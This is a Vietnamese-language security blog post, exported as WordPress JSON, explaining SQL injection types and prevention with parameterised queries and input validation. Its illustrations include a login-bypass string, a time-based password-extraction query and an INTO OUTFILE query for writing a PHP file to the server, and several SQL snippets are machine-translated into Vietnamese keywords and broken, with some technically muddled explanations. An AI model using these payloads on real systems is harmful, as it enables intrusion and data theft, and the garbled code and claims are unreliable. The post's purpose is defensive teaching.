{"id":505,"date":"2022-08-06T22:53:54","date_gmt":"2022-08-06T22:53:54","guid":{"rendered":"https:\/\/securitybriefing.net\/?p=505"},"modified":"2022-08-06T22:53:54","modified_gmt":"2022-08-06T22:53:54","slug":"sql-injection-101-sqli-la-gi-va-cach-ngan-chan-cac-cuoc-tan-cong","status":"publish","type":"post","link":"https:\/\/securitybriefing.net\/vi\/bao-ve\/sql-injection-101-sqli-la-gi-va-cach-ngan-chan-cac-cuoc-tan-cong\/","title":{"rendered":"SQL Injection 101: SQLi l\u00e0 g\u00ec v\u00e0 c\u00e1ch ng\u0103n ch\u1eb7n c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng"},"content":{"rendered":"

SQL injection l\u00e0 g\u00ec<\/strong><\/h2>\n\n\n

SQL injection (SQLi) l\u00e0 m\u1ed9t lo\u1ea1i t\u1ea5n c\u00f4ng cho ph\u00e9p t\u1ed9i ph\u1ea1m th\u1ef1c thi c\u00e1c c\u00e2u l\u1ec7nh SQL \u0111\u1ed9c h\u1ea1i ch\u1ed1ng l\u1ea1i c\u00e1c \u1ee9ng d\u1ee5ng web d\u1ec5 b\u1ecb t\u1ed5n th\u01b0\u01a1ng. K\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 truy c\u1eadp d\u1eef li\u1ec7u nh\u1ea1y c\u1ea3m, ch\u1eb3ng h\u1ea1n nh\u01b0 th\u00f4ng tin kh\u00e1ch h\u00e0ng, d\u1eef li\u1ec7u c\u00e1 nh\u00e2n, b\u00ed m\u1eadt th\u01b0\u01a1ng m\u1ea1i v\u00e0 nhi\u1ec1u h\u01a1n n\u1eefa b\u1eb1ng c\u00e1ch v\u01b0\u1ee3t qua c\u00e1c bi\u1ec7n ph\u00e1p b\u1ea3o m\u1eadt c\u1ee7a \u1ee9ng d\u1ee5ng. \u1ede \u0111\u00e2y ch\u00fang ta s\u1ebd th\u1ea3o lu\u1eadn v\u1ec1 SQL injection, c\u00e1ch n\u00f3 ho\u1ea1t \u0111\u1ed9ng v\u00e0 c\u00e1ch b\u1ea1n c\u00f3 th\u1ec3 ng\u0103n ch\u1eb7n c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng.<\/p>\n\n\n\n

C\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng SQL injection c\u00f3 th\u1ec3 x\u1ea3y ra tr\u00ean b\u1ea5t k\u1ef3 trang web n\u00e0o s\u1eed d\u1ee5ng c\u01a1 s\u1edf d\u1eef li\u1ec7u SQL. Lo\u1ea1i t\u1ea5n c\u00f4ng n\u00e0y cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng truy c\u1eadp v\u00e0o d\u1eef li\u1ec7u quan tr\u1ecdng c\u1ee7a b\u1ea1n. H\u1ecd c\u00f3 th\u1ec3 xem th\u00f4ng tin ng\u01b0\u1eddi ti\u00eau d\u00f9ng, d\u1eef li\u1ec7u c\u00e1 nh\u00e2n, b\u00ed m\u1eadt th\u01b0\u01a1ng m\u1ea1i v\u00e0 t\u00e0i s\u1ea3n tr\u00ed tu\u1ec7. \u0110\u00e2y l\u00e0 m\u1ed9t trong nh\u1eefng lo\u1ea1i t\u1ea5n c\u00f4ng nghi\u00eam tr\u1ecdng nh\u1ea5t tr\u00ean c\u00e1c \u1ee9ng d\u1ee5ng web, theo OWASP.<\/p>\n\n\n

C\u00e1c lo\u1ea1i SQL Injection<\/strong><\/h2>\n\n\n
\"C\u00e1c<\/figure>\n\n\n

SQLi trong b\u0103ng t\u1ea7n<\/strong><\/h3>\n\n\n

In-band SQL injection l\u00e0 m\u1ed9t cu\u1ed9c t\u1ea5n c\u00f4ng m\u00e0 k\u1ebb t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng c\u00f9ng m\u1ed9t k\u00eanh \u0111\u1ec3 g\u1eedi v\u00e0 nh\u1eadn truy v\u1ea5n. In-band c\u00f3 ngh\u0129a l\u00e0 ph\u1ea3n h\u1ed3i \u0111\u01b0\u1ee3c nh\u1eadn b\u1eb1ng c\u00e1ch s\u1eed d\u1ee5ng c\u00f9ng m\u1ed9t ph\u01b0\u01a1ng ti\u1ec7n truy\u1ec1n th\u00f4ng. M\u1ee5c ti\u00eau c\u1ee7a k\u1ebb t\u1ea5n c\u00f4ng l\u00e0 nh\u1eadn \u0111\u01b0\u1ee3c ph\u1ea3n h\u1ed3i trong tr\u00ecnh duy\u1ec7t web ngay l\u1eadp t\u1ee9c, n\u1ebfu c\u00f3 th\u1ec3 khi th\u1ef1c hi\u1ec7n cu\u1ed9c t\u1ea5n c\u00f4ng th\u1ee7 c\u00f4ng v\u1edbi tr\u00ecnh duy\u1ec7t web.<\/p>\n\n\n\n

V\u00ed d\u1ee5 v\u1ec1 in-band SQL injection<\/strong><\/p>\n\n\n\n

C\u00e1ch ph\u1ed5 bi\u1ebfn nh\u1ea5t \u0111\u1ec3 k\u1ebb t\u1ea5n c\u00f4ng th\u1ef1c hi\u1ec7n in-band SQL injection l\u00e0 thay \u0111\u1ed5i y\u00eau c\u1ea7u \u0111\u1ec3 h\u1ecd c\u00f3 th\u1ec3 xem th\u00f4ng tin c\u00e1 nh\u00e2n c\u1ee7a ng\u01b0\u1eddi d\u00f9ng hi\u1ec7n t\u1ea1i. \u0110i\u1ec1u n\u00e0y c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c th\u1ef1c hi\u1ec7n b\u1eb1ng c\u00e1ch thay \u0111\u1ed5i gi\u00e1 tr\u1ecb \u0111\u01b0\u1ee3c g\u1eedi nh\u01b0 m\u1ed9t ph\u1ea7n c\u1ee7a y\u00eau c\u1ea7u. V\u00ed d\u1ee5, n\u1ebfu c\u00e2u l\u1ec7nh \u0111\u01b0\u1ee3c cho l\u00e0 hi\u1ec3n th\u1ecb t\u00ean c\u1ee7a ng\u01b0\u1eddi d\u00f9ng, k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 thay \u0111\u1ed5i n\u00f3 \u0111\u1ec3 t\u00ean c\u1ee7a h\u1ecd \u0111\u01b0\u1ee3c hi\u1ec3n th\u1ecb thay th\u1ebf.<\/p>\n\n\n\n

CH\u1eccN * T\u1eea ng\u01b0\u1eddi d\u00f9ng N\u01a0I user_id GI\u1ed0NG 'ng\u01b0\u1eddi_d\u00f9ng_hi\u1ec7n_t\u1ea1i'<\/pre>\n\n\n\n
Error-based SQLi v\u00e0 Union-based SQLi l\u00e0 hai h\u00ecnh th\u1ee9c ph\u1ed5 bi\u1ebfn nh\u1ea5t c\u1ee7a in-band SQL injection.<\/p>\n\n\n
SQLi d\u1ef1a tr\u00ean l\u1ed7i<\/strong><\/h4>\n\n\n
K\u1ef9 thu\u1eadt SQLi d\u1ef1a tr\u00ean l\u1ed7i l\u00e0 m\u1ed9t ph\u01b0\u01a1ng ph\u00e1p in-band SQL injection l\u1ee3i d\u1ee5ng c\u00e1c th\u00f4ng b\u00e1o l\u1ed7i c\u1ee7a m\u00e1y ch\u1ee7 c\u01a1 s\u1edf d\u1eef li\u1ec7u \u0111\u1ec3 kh\u00e1m ph\u00e1 ki\u1ebfn tr\u00fac c\u1ee7a c\u01a1 s\u1edf d\u1eef li\u1ec7u. SQL injection d\u1ef1a tr\u00ean l\u1ed7i l\u00e0 lo\u1ea1i ph\u1ed5 bi\u1ebfn nh\u1ea5t c\u1ee7a in-band SQL injection.<\/p>\n\n\n\n
V\u00ed d\u1ee5 v\u1ec1 error-based SQLi:<\/strong><\/p>\n\n\n\n
N\u1ebfu m\u1ed9t k\u1ebb t\u1ea5n c\u00f4ng c\u1ed1 g\u1eafng \u0111\u0103ng nh\u1eadp v\u1edbi c\u00e1c th\u00f4ng tin sau:<\/p>\n\n\n\n
username: ' OR 'a'='apassword: b\u1ea5t k\u1ef3<\/pre>\n\n\n\n
C\u01a1 s\u1edf d\u1eef li\u1ec7u s\u1ebd tr\u1ea3 v\u1ec1 m\u1ed9t l\u1ed7i v\u00ec c\u00e2u l\u1ec7nh kh\u00f4ng \u0111\u00fang c\u00fa ph\u00e1p. Th\u00f4ng b\u00e1o l\u1ed7i s\u1ebd ti\u1ebft l\u1ed9 th\u00f4ng tin v\u1ec1 c\u01a1 s\u1edf d\u1eef li\u1ec7u, m\u00e0 k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 s\u1eed d\u1ee5ng \u0111\u1ec3 l\u1ee3i d\u1ee5ng.<\/p>\n\n\n
SQLi d\u1ef1a tr\u00ean Union:<\/strong><\/h4>\n\n\n
In-band SQL injection l\u00e0 m\u1ed9t c\u00e1ch \u0111\u1ec3 l\u1ea5y th\u00f4ng tin t\u1eeb m\u1ed9t trang web b\u1eb1ng c\u00e1ch s\u1eed d\u1ee5ng to\u00e1n t\u1eed UNION \u0111\u1ec3 k\u1ebft h\u1ee3p k\u1ebft qu\u1ea3 c\u1ee7a hai ho\u1eb7c nhi\u1ec1u c\u00e2u l\u1ec7nh SELECT.<\/p>\n\n\n
Ti\u00eam SQL m\u00f9<\/strong><\/h3>\n\n\n
Blind SQL injection l\u00e0 m\u1ed9t cu\u1ed9c t\u1ea5n c\u00f4ng m\u00e0 k\u1ebb t\u1ea5n c\u00f4ng c\u1ed1 g\u1eafng l\u1ea5y c\u00e2u tr\u1ea3 l\u1eddi t\u1eeb c\u01a1 s\u1edf d\u1eef li\u1ec7u b\u1eb1ng c\u00e1ch \u0111\u1eb7t c\u00e2u h\u1ecfi s\u1ebd d\u1eabn \u0111\u1ebfn m\u1ed9t ph\u1ea3n h\u1ed3i \u0111\u00fang ho\u1eb7c sai. K\u1ebb t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng th\u00f4ng b\u00e1o l\u1ed7i \u0111\u1ec3 xem li\u1ec7u \u1ee9ng d\u1ee5ng c\u00f3 ph\u1ea3n h\u1ed3i kh\u00e1c nhau khi m\u1ed9t m\u00e3 c\u1ee5 th\u1ec3 \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng hay kh\u00f4ng.<\/p>\n\n\n\n
Khi m\u1ed9t hacker s\u1eed d\u1ee5ng SQL injection, \u1ee9ng d\u1ee5ng web c\u00f3 th\u1ec3 hi\u1ec3n th\u1ecb c\u00e1c th\u00f4ng b\u00e1o c\u1ea3nh b\u00e1o c\u01a1 s\u1edf d\u1eef li\u1ec7u quan tr\u1ecdng cho bi\u1ebft r\u1eb1ng c\u00fa ph\u00e1p truy v\u1ea5n SQL kh\u00f4ng \u0111\u00fang. Blind SQL injection ho\u1ea1t \u0111\u1ed9ng gi\u1ed1ng nh\u01b0 SQL injection truy\u1ec1n th\u1ed1ng, ngo\u1ea1i tr\u1eeb c\u00e1ch d\u1eef li\u1ec7u \u0111\u01b0\u1ee3c l\u1ea5y t\u1eeb c\u01a1 s\u1edf d\u1eef li\u1ec7u. N\u1ebfu m\u1ed9t c\u01a1 s\u1edf d\u1eef li\u1ec7u kh\u00f4ng c\u00f3 \u0111\u1ee7 th\u00f4ng tin \u0111\u1ec3 k\u1ebb t\u1ea5n c\u00f4ng l\u1ee3i d\u1ee5ng, k\u1ebb t\u1ea5n c\u00f4ng ph\u1ea3i \u0111\u1eb7t m\u1ed9t lo\u1ea1t c\u00e2u h\u1ecfi \u0111\u1ec3 l\u1ea5y d\u1eef li\u1ec7u.<\/p>\n\n\n\n
Blind SQL injection \u0111\u01b0\u1ee3c chia th\u00e0nh blind-boolean-based SQLi v\u00e0 Blind-time-based SQLi.<\/p>\n\n\n
SQLi m\u00f9 d\u1ef1a tr\u00ean Boolean<\/strong><\/h4>\n\n\n
Boolean-based Blind SQL injection l\u00e0 m\u1ed9t cu\u1ed9c t\u1ea5n c\u00f4ng m\u00e0 k\u1ebb t\u1ea5n c\u00f4ng c\u1ed1 g\u1eafng l\u1ea5y c\u00e2u tr\u1ea3 l\u1eddi t\u1eeb c\u01a1 s\u1edf d\u1eef li\u1ec7u b\u1eb1ng c\u00e1ch \u0111\u1eb7t c\u00e2u h\u1ecfi s\u1ebd d\u1eabn \u0111\u1ebfn m\u1ed9t ph\u1ea3n h\u1ed3i \u0111\u00fang ho\u1eb7c sai. K\u1ebb t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng th\u00f4ng b\u00e1o l\u1ed7i \u0111\u1ec3 xem li\u1ec7u \u1ee9ng d\u1ee5ng c\u00f3 ph\u1ea3n h\u1ed3i kh\u00e1c nhau khi m\u1ed9t m\u00e3 c\u1ee5 th\u1ec3 \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng hay kh\u00f4ng.<\/p>\n\n\n\n
V\u00ed d\u1ee5 v\u1ec1 boolean-based Blind SQLi:<\/p>\n\n\n\n
N\u1ebfu m\u1ed9t k\u1ebb t\u1ea5n c\u00f4ng mu\u1ed1n t\u00ecm ra lo\u1ea1i c\u01a1 s\u1edf d\u1eef li\u1ec7u, h\u1ecd s\u1ebd s\u1eed d\u1ee5ng c\u00e2u l\u1ec7nh sau:<\/p>\n\n\n\n
CH\u1eccN * T\u1eea ng\u01b0\u1eddi d\u00f9ng N\u01a0I user_id GI\u1ed0NG 'ng\u01b0\u1eddi_d\u00f9ng_hi\u1ec7n_t\u1ea1i' v\u00e0 c\u01a1_s\u1edf_d\u1eef_li\u1ec7u() gi\u1ed1ng '%type%'<\/pre>\n\n\n\n
N\u1ebfu c\u01a1 s\u1edf d\u1eef li\u1ec7u l\u00e0 MySQL, k\u1ebft qu\u1ea3 s\u1ebd gi\u1ed1ng nh\u01b0 sau:<\/p>\n\n\n\n
B\u1ea1n c\u00f3 l\u1ed7i trong c\u00fa ph\u00e1p SQL c\u1ee7a m\u00ecnh; h\u00e3y ki\u1ec3m tra h\u01b0\u1edbng d\u1eabn t\u01b0\u01a1ng \u1ee9ng v\u1edbi phi\u00ean b\u1ea3n m\u00e1y ch\u1ee7 MySQL c\u1ee7a b\u1ea1n \u0111\u1ec3 s\u1eed d\u1ee5ng c\u00fa ph\u00e1p \u0111\u00fang g\u1ea7n \u2018and database() like \u2018%type%\u201d t\u1ea1i d\u00f2ng<\/p>\n\n\n
Ti\u00eam SQL m\u00f9 d\u1ef1a tr\u00ean th\u1eddi gian<\/strong><\/h4>\n\n\n
M\u1ed9t cu\u1ed9c t\u1ea5n c\u00f4ng Blind d\u1ef1a tr\u00ean th\u1eddi gian l\u00e0 khi m\u1ed9t l\u1ec7nh SQL \u0111\u01b0\u1ee3c g\u1eedi \u0111\u1ebfn m\u00e1y ch\u1ee7 v\u1edbi m\u00e3 khi\u1ebfn c\u00e1c truy v\u1ea5n th\u1ef1c thi ch\u1eadm h\u01a1n.<\/p>\n\n\n\n
C\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng Blind d\u1ef1a tr\u00ean th\u1eddi gian cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng tr\u00edch xu\u1ea5t d\u1eef li\u1ec7u d\u1ef1a tr\u00ean th\u1eddi gian truy c\u1eadp. M\u1ed9t cu\u1ed9c t\u1ea5n c\u00f4ng nh\u01b0 v\u1eady \u0111\u01b0\u1ee3c g\u1ecdi l\u00e0 m\u1ed9t cu\u1ed9c t\u1ea5n c\u00f4ng ti\u00eam m\u00f9 ho\u1eb7c suy lu\u1eadn. \u0110\u00e2y l\u00e0 m\u1ed9t lo\u1ea1i t\u1ea5n c\u00f4ng m\u00e0 kh\u00f4ng c\u00f3 d\u1eef li\u1ec7u n\u00e0o ch\u1ea3y gi\u1eefa k\u1ebb t\u1ea5n c\u00f4ng v\u00e0 c\u01a1 s\u1edf d\u1eef li\u1ec7u, nh\u01b0ng v\u00ec kh\u00f4ng c\u00f3 ph\u1ea3n h\u1ed3i, n\u00f3 c\u0169ng \u0111\u01b0\u1ee3c g\u1ecdi l\u00e0 m\u1ed9t cu\u1ed9c t\u1ea5n c\u00f4ng ti\u00eam m\u00f9.<\/p>\n\n\n\n
Th\u1eddi gian ph\u1ea3n h\u1ed3i cho bi\u1ebft li\u1ec7u c\u00e2u tr\u1ea3 l\u1eddi c\u00f3 \u0111\u00fang hay kh\u00f4ng. N\u1ebfu ph\u1ea3n h\u1ed3i l\u00e0 ti\u00eau c\u1ef1c, k\u1ebb x\u00e2m nh\u1eadp s\u1ebd th\u1ef1c hi\u1ec7n m\u1ed9t y\u00eau c\u1ea7u kh\u00e1c. K\u1ef9 thu\u1eadt t\u1ea5n c\u00f4ng n\u00e0y ch\u1eadm v\u00ec hacker ph\u1ea3i \u0111i qua t\u1eebng k\u00fd t\u1ef1 m\u1ed9t c\u00e1ch ri\u00eang l\u1ebb, \u0111\u1eb7c bi\u1ec7t l\u00e0 khi t\u1ea5n c\u00f4ng c\u00e1c c\u01a1 s\u1edf d\u1eef li\u1ec7u l\u1edbn.<\/p>\n\n\n\n
V\u00ed d\u1ee5 v\u1ec1 blind SQLi<\/strong><\/p>\n\n\n\n
Trong v\u00ed d\u1ee5 n\u00e0y, k\u1ebb t\u1ea5n c\u00f4ng c\u1ed1 g\u1eafng x\u00e1c \u0111\u1ecbnh xem ng\u01b0\u1eddi d\u00f9ng c\u00f3 id=999 c\u00f3 t\u1ed3n t\u1ea1i trong c\u01a1 s\u1edf d\u1eef li\u1ec7u hay kh\u00f4ng. \u0110\u1ec3 l\u00e0m \u0111i\u1ec1u n\u00e0y, h\u1ecd s\u1eed d\u1ee5ng c\u00e2u l\u1ec7nh sau:<\/p>\n\n\n\n
IF(SUBSTRING((CH\u1eccN m\u1eadt_kh\u1ea9u T\u1eea ng\u01b0\u1eddi_d\u00f9ng N\u01a0I user_id=999),0, LEN('b\u00ed_m\u1eadt'))='b\u00ed_m\u1eadt', NG\u1ee6(30), 'sai')<\/pre>\n\n\n\n
N\u1ebfu ng\u01b0\u1eddi d\u00f9ng c\u00f3 id 999 t\u1ed3n t\u1ea1i trong c\u01a1 s\u1edf d\u1eef li\u1ec7u v\u00e0 m\u1eadt kh\u1ea9u c\u1ee7a h\u1ecd l\u00e0 secret, th\u00ec \u1ee9ng d\u1ee5ng s\u1ebd ng\u1ee7 trong 30 gi\u00e2y. \u1ee8ng d\u1ee5ng s\u1ebd tr\u1ea3 v\u1ec1 false n\u1ebfu ng\u01b0\u1eddi d\u00f9ng kh\u00f4ng t\u1ed3n t\u1ea1i trong c\u01a1 s\u1edf d\u1eef li\u1ec7u.<\/p>\n\n\n
SQLi ngo\u00e0i b\u0103ng t\u1ea7n<\/strong><\/h3>\n\n\n
Ai \u0111\u00f3 mu\u1ed1n \u0111\u00e1nh c\u1eafp d\u1eef li\u1ec7u c\u00f3 th\u1ec3 g\u1eedi m\u00e3 SQL \u0111\u1ebfn m\u00e1y ch\u1ee7 c\u01a1 s\u1edf d\u1eef li\u1ec7u theo c\u00e1ch kh\u00f4ng ph\u1ea3i l\u00e0 m\u1ed9t ph\u1ea7n c\u1ee7a giao ti\u1ebfp th\u00f4ng th\u01b0\u1eddng gi\u1eefa m\u00e1y ch\u1ee7 v\u00e0 c\u00e1c m\u00e1y t\u00ednh kh\u00e1c. \u0110i\u1ec1u n\u00e0y c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c th\u1ef1c hi\u1ec7n b\u1eb1ng c\u00e1ch g\u1eedi th\u00f4ng tin \u0111\u1ebfn m\u00e1y ch\u1ee7 th\u00f4ng qua c\u00e1c y\u00eau c\u1ea7u DNS ho\u1eb7c HTTP.<\/p>\n\n\n\n
Ph\u1ea3n h\u1ed3i c\u1ee7a \u1ee9ng d\u1ee5ng s\u1ebd kh\u00f4ng b\u1ecb \u1ea3nh h\u01b0\u1edfng b\u1edfi vi\u1ec7c c\u00f3 hay kh\u00f4ng c\u00f3 d\u1eef li\u1ec7u n\u00e0o \u0111\u01b0\u1ee3c tr\u1ea3 v\u1ec1, c\u00f3 hay kh\u00f4ng c\u00f3 v\u1ea5n \u0111\u1ec1 v\u1edbi c\u01a1 s\u1edf d\u1eef li\u1ec7u, ho\u1eb7c m\u1ea5t bao l\u00e2u \u0111\u1ec3 th\u1ef1c thi truy v\u1ea5n. Out-of-band c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng trong c\u00e1c t\u01b0\u01a1ng t\u00e1c m\u1ea1ng \u0111\u1ec3 k\u00edch ho\u1ea1t c\u00e1c s\u1ef1 ki\u1ec7n theo \u00fd mu\u1ed1n. T\u00f9y thu\u1ed9c v\u00e0o \u0111i\u1ec1u ki\u1ec7n \u0111\u01b0\u1ee3c ti\u00eam, ch\u00fang c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c k\u00edch ho\u1ea1t c\u00f3 \u0111i\u1ec1u ki\u1ec7n \u0111\u1ec3 thu th\u1eadp ki\u1ebfn th\u1ee9c t\u1eebng ch\u00fat m\u1ed9t.<\/p>\n\n\n\n
D\u1eef li\u1ec7u c\u0169ng c\u00f3 th\u1ec3 r\u00f2 r\u1ec9 th\u00f4ng qua m\u1ed9t s\u1ed1 giao th\u1ee9c m\u1ea1ng t\u1eeb c\u00e1c t\u01b0\u01a1ng t\u00e1c m\u1ea1ng. H\u00ecnh \u1ea3nh \u0111\u1ea1i di\u1ec7n cho y\u00eau c\u1ea7u \u0111\u01b0\u1ee3c g\u1eedi t\u1eeb \u1ee9ng d\u1ee5ng web \u0111\u1ebfn c\u01a1 s\u1edf d\u1eef li\u1ec7u c\u1ee7a \u1ee9ng d\u1ee5ng.<\/p>\n\n\n\n
V\u00ed d\u1ee5 v\u1ec1 out-of-band SQLi<\/strong><\/p>\n\n\n\n
Trong v\u00ed d\u1ee5 n\u00e0y, k\u1ebb t\u1ea5n c\u00f4ng c\u1ed1 g\u1eafng x\u00e1c \u0111\u1ecbnh xem m\u1ed9t ng\u01b0\u1eddi d\u00f9ng c\u1ee5 th\u1ec3 c\u00f3 t\u1ed3n t\u1ea1i trong c\u01a1 s\u1edf d\u1eef li\u1ec7u hay kh\u00f4ng. \u0110\u1ec3 l\u00e0m \u0111i\u1ec1u n\u00e0y, h\u1ecd s\u1eed d\u1ee5ng c\u00e2u l\u1ec7nh sau:<\/p>\n\n\n\n
SELECT user_id FROM users WHERE username='$username' AND password='$password' LIMIT 0,0 UNION SELECT NULL,'' INTO OUTFILE '\/var\/opt\/databases\/$filename.php'; --<\/pre>\n\n\n\n
\u1ee8ng d\u1ee5ng s\u1ebd tr\u1ea3 v\u1ec1 ID ng\u01b0\u1eddi d\u00f9ng c\u1ee7a h\u1ecd n\u1ebfu ng\u01b0\u1eddi d\u00f9ng t\u1ed3n t\u1ea1i trong c\u01a1 s\u1edf d\u1eef li\u1ec7u. N\u1ebfu ng\u01b0\u1eddi d\u00f9ng kh\u00f4ng t\u1ed3n t\u1ea1i trong c\u01a1 s\u1edf d\u1eef li\u1ec7u, th\u00ec \u1ee9ng d\u1ee5ng s\u1ebd t\u1ea1o m\u1ed9t t\u1ec7p ch\u1ee9a m\u00e3 PHP c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng \u0111\u1ec3 th\u1ef1c thi c\u00e1c l\u1ec7nh h\u1ec7 th\u1ed1ng. K\u1ebb t\u1ea5n c\u00f4ng sau \u0111\u00f3 c\u00f3 th\u1ec3 s\u1eed d\u1ee5ng t\u1ec7p n\u00e0y \u0111\u1ec3 ch\u1ea1y c\u00e1c l\u1ec7nh tr\u00ean m\u00e1y ch\u1ee7.<\/p>\n\n\n
C\u00e1ch ng\u0103n ch\u1eb7n SQL injection<\/strong><\/h2>\n\n\n
C\u00e1ch t\u1ed1t nh\u1ea5t \u0111\u1ec3 b\u1ea3o v\u1ec7 ch\u1ed1ng l\u1ea1i c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng SQL injection l\u00e0 s\u1eed d\u1ee5ng x\u00e1c th\u1ef1c \u0111\u1ea7u v\u00e0o, c\u00e2u l\u1ec7nh chu\u1ea9n b\u1ecb s\u1eb5n v\u00e0 truy v\u1ea5n c\u00f3 tham s\u1ed1. M\u00e3 kh\u00f4ng bao gi\u1edd n\u00ean s\u1eed d\u1ee5ng tr\u1ef1c ti\u1ebfp \u0111\u1ea7u v\u00e0o c\u1ee7a ng\u01b0\u1eddi d\u00f9ng. C\u00e1c nh\u00e0 ph\u00e1t tri\u1ec3n ph\u1ea3i l\u00e0m s\u1ea1ch t\u1ea5t c\u1ea3 \u0111\u1ea7u v\u00e0o thay v\u00ec ch\u1ec9 c\u00e1c \u0111\u1ea7u v\u00e0o t\u1eeb bi\u1ec3u m\u1eabu web nh\u01b0 bi\u1ec3u m\u1eabu \u0111\u0103ng nh\u1eadp. D\u1ea5u nh\u00e1y \u0111\u01a1n n\u00ean \u0111\u01b0\u1ee3c lo\u1ea1i b\u1ecf kh\u1ecfi b\u1ea5t k\u1ef3 th\u00e0nh ph\u1ea7n m\u00e3 \u0111\u00e1ng ng\u1edd n\u00e0o. C\u0169ng l\u00e0 m\u1ed9t \u00fd t\u01b0\u1edfng t\u1ed1t \u0111\u1ec3 \u1ea9n c\u00e1c v\u1ea5n \u0111\u1ec1 c\u01a1 s\u1edf d\u1eef li\u1ec7u tr\u00ean c\u00e1c trang web tr\u1ef1c ti\u1ebfp \u0111\u1ec3 tr\u00e1nh v\u00f4 t\u00ecnh ti\u1ebft l\u1ed9 ch\u00fang. SQL injection c\u00f3 th\u1ec3 cung c\u1ea5p th\u00f4ng tin v\u1ec1 h\u1ec7 th\u1ed1ng c\u01a1 s\u1edf d\u1eef li\u1ec7u m\u00e0 k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 s\u1eed d\u1ee5ng \u0111\u1ec3 l\u1ee3i d\u1ee5ng.<\/p>\n\n\n\n
N\u1ebfu b\u1ea1n ph\u00e1t hi\u1ec7n v\u1ea5n \u0111\u1ec1 v\u1edbi trang web c\u1ee7a m\u00ecnh, b\u1ea1n n\u00ean \u0111\u01b0a n\u00f3 offline ngay l\u1eadp t\u1ee9c v\u00e0 li\u00ean h\u1ec7 v\u1edbi nh\u00e0 cung c\u1ea5p d\u1ecbch v\u1ee5 l\u01b0u tr\u1eef c\u1ee7a b\u1ea1n. H\u1ecd c\u00f3 th\u1ec3 gi\u00fap b\u1ea1n x\u00e1c \u0111\u1ecbnh li\u1ec7u trang web c\u1ee7a b\u1ea1n c\u00f3 b\u1ecb x\u00e2m ph\u1ea1m hay kh\u00f4ng v\u00e0 nh\u1eefng b\u01b0\u1edbc b\u1ea1n c\u1ea7n th\u1ef1c hi\u1ec7n \u0111\u1ec3 kh\u1eafc ph\u1ee5c v\u1ea5n \u0111\u1ec1. Trong th\u1eddi gian ch\u1edd \u0111\u1ee3i, h\u00e3y \u0111\u1ea3m b\u1ea3o r\u1eb1ng t\u1ea5t c\u1ea3 ng\u01b0\u1eddi d\u00f9ng c\u1ee7a trang web c\u1ee7a b\u1ea1n bi\u1ebft v\u1ec1 v\u1ea5n \u0111\u1ec1 v\u00e0 thay \u0111\u1ed5i m\u1eadt kh\u1ea9u c\u1ee7a h\u1ecd c\u00e0ng s\u1edbm c\u00e0ng t\u1ed1t.<\/p>\n\n\n
M\u1eb9o ph\u00f2ng ng\u1eeba \u0111\u1ec3 tr\u00e1nh SQL injection<\/strong><\/h2>\n\n\n
C\u00f3 m\u1ed9t v\u00e0i c\u00e1ch \u0111\u1ec3 tr\u00e1nh c\u00e1c l\u1ed7 h\u1ed5ng SQL injection trong ng\u00f4n ng\u1eef l\u1eadp tr\u00ecnh v\u00e0 thi\u1ebft l\u1eadp c\u01a1 s\u1edf d\u1eef li\u1ec7u c\u1ee7a b\u1ea1n. Nh\u1eefng k\u1ef9 thu\u1eadt n\u00e0y c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng v\u1edbi h\u1ea7u h\u1ebft c\u00e1c c\u01a1 s\u1edf d\u1eef li\u1ec7u, ch\u1eb3ng h\u1ea1n nh\u01b0 XML. B\u1ea1n c\u00f3 th\u1ec3 s\u1eed d\u1ee5ng nh\u1eefng k\u1ef9 thu\u1eadt n\u00e0y \u0111\u1ec3 l\u00e0m cho c\u01a1 s\u1edf d\u1eef li\u1ec7u c\u1ee7a b\u1ea1n an to\u00e0n h\u01a1n.<\/p>\n\n\n
1) S\u1eed d\u1ee5ng c\u00e1c th\u1ee7 t\u1ee5c l\u01b0u tr\u1eef \u0111\u01b0\u1ee3c x\u00e2y d\u1ef1ng \u0111\u00fang c\u00e1ch<\/h3>\n\n\n
Ng\u01b0\u1eddi m\u1edbi b\u1eaft \u0111\u1ea7u n\u00ean b\u1eaft \u0111\u1ea7u b\u1eb1ng c\u00e1ch h\u1ecdc c\u00e1ch t\u1ea1o c\u00e1c c\u00e2u l\u1ec7nh v\u1edbi bi\u1ebfn. \u0110i\u1ec1u n\u00e0y d\u1ec5 h\u01a1n so v\u1edbi t\u1ea1o c\u00e1c truy v\u1ea5n \u0111\u1ed9ng v\u00e0 d\u1ec5 hi\u1ec3u h\u01a1n. Truy v\u1ea5n c\u00f3 tham s\u1ed1 l\u00e0 n\u01a1i nh\u00e0 ph\u00e1t tri\u1ec3n t\u1ea1o t\u1ea5t c\u1ea3 m\u00e3 SQL v\u00e0 sau \u0111\u00f3 cung c\u1ea5p t\u1eebng tham s\u1ed1 v\u00e0o m\u1ed9t ng\u00e0y sau \u0111\u00f3. Ph\u01b0\u01a1ng ph\u00e1p n\u00e0y cho ph\u00e9p c\u01a1 s\u1edf d\u1eef li\u1ec7u x\u00e1c \u0111\u1ecbnh gi\u1eefa m\u00e3 ngu\u1ed3n v\u00e0 th\u00f4ng tin.<\/p>\n\n\n\n
